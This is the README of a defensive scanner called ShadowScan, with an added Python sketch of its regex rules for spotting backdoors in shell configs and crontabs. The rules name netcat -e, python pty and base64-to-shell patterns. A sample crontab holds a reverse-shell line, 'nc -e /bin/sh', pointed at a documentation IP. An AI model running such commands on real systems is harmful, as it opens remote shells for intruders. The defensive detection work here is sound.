ShadowScan is a security tool designed to scan files and system configurations for hidden backdoors, malicious scripts, and reverse shells on Linux and macOS.
ShadowScan is an open-source cybersecurity tool built for penetration testers, system administrators, and security researchers. It performs a deep scan of system files, looking for patterns commonly used in backdoors, malware, and reverse shells. The tool is optimized for Linux distributions (Arch, Debian, Ubuntu, Fedora, etc.) and macOS, making it a lightweight but powerful security solution.
✔ Detects hidden backdoors in shell scripts (.bashrc, .bash_profile, cron jobs).
✔ Scans for reverse shells, common obfuscation techniques, and suspicious commands (nc -e, python -c 'import pty').
✔ Integrates with VirusTotal and other threat intelligence APIs for checking unknown binaries.
✔ Identifies unauthorized SSH keys and altered system configurations.
✔ Creates a detailed security report highlighting the most critical findings.
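The pattern matching described in the feature list can be sketched as follows. This is an added example, not ShadowScan's own code: the rule names, the `Finding` layout, the `base64-to-shell` rule and the sample inputs are assumptions made for illustration.

```python
import json
import re
from dataclasses import asdict, dataclass

# The first two rules cover the commands named in the feature list; the third is
# an assumed example of an obfuscation pattern (decoded text piped to a shell).
RULES = [
    ("netcat-exec", re.compile(r"\b(?:nc|ncat|netcat)\b[^|;&\n]*\s-[A-Za-z]*e\b")),
    ("python-pty", re.compile(r"\bpython[0-9.]*\s+-c\s+['\"].*\bimport\s+pty\b")),
    ("base64-to-shell", re.compile(r"\bbase64\s+(?:-d|--decode)\b.*\|\s*(?:ba|z|da)?sh\b")),
]

@dataclass
class Finding:
    source: str  # file or crontab the line came from
    line: int    # 1-based line number
    rule: str    # name of the rule that matched
    text: str    # the offending line, stripped

def scan_text(source, text):
    """Return a Finding for every rule that matches a non-comment line."""
    findings = []
    for number, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and full-line comments are never executed
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append(Finding(source, number, name, line))
    return findings

def to_report(findings):
    return json.dumps([asdict(f) for f in findings], indent=2)

# Constructed sample inputs (not real system files); 192.0.2.10 is a documentation IP.
SAMPLE_BASHRC = """\
# nc -e appears here only inside a comment
alias ll='ls -la'
python -c 'import pty'
echo ZWNobyBoaQ== | base64 -d | sh
"""
SAMPLE_CRON = """\
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * nc -e /bin/sh 192.0.2.10 4444
17 * * * * nc -zv 192.0.2.10 22
"""
if __name__ == "__main__":
    hits = scan_text(".bashrc", SAMPLE_BASHRC) + scan_text("crontab", SAMPLE_CRON)
    print(to_report(hits))
```

The `nc -zv` port check in the sample crontab is deliberately not flagged: the rule requires the `-e` option, which keeps ordinary netcat use out of the report.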
- Clone the repository:
git clone https://github.com/yourusername/ShadowScan.git
cd ShadowScan
- Install dependencies:
pip install -r requirements.txt
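- Scan a directory:
python src/shadowscan.py --scan /path/to/directory
- Scan a directory and check files against VirusTotal:
python src/shadowscan.py --scan /path/to/directory --virustotal YOUR_API_KEY
- Scan a directory and write the report to a JSON file:
python src/shadowscan.py --scan /path/to/directory --report output.json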
- Fork the repository.
- Create a new branch.
- Commit your changes.
- Submit a pull request.
ShadowScan is licensed under the BSD 3-Clause License.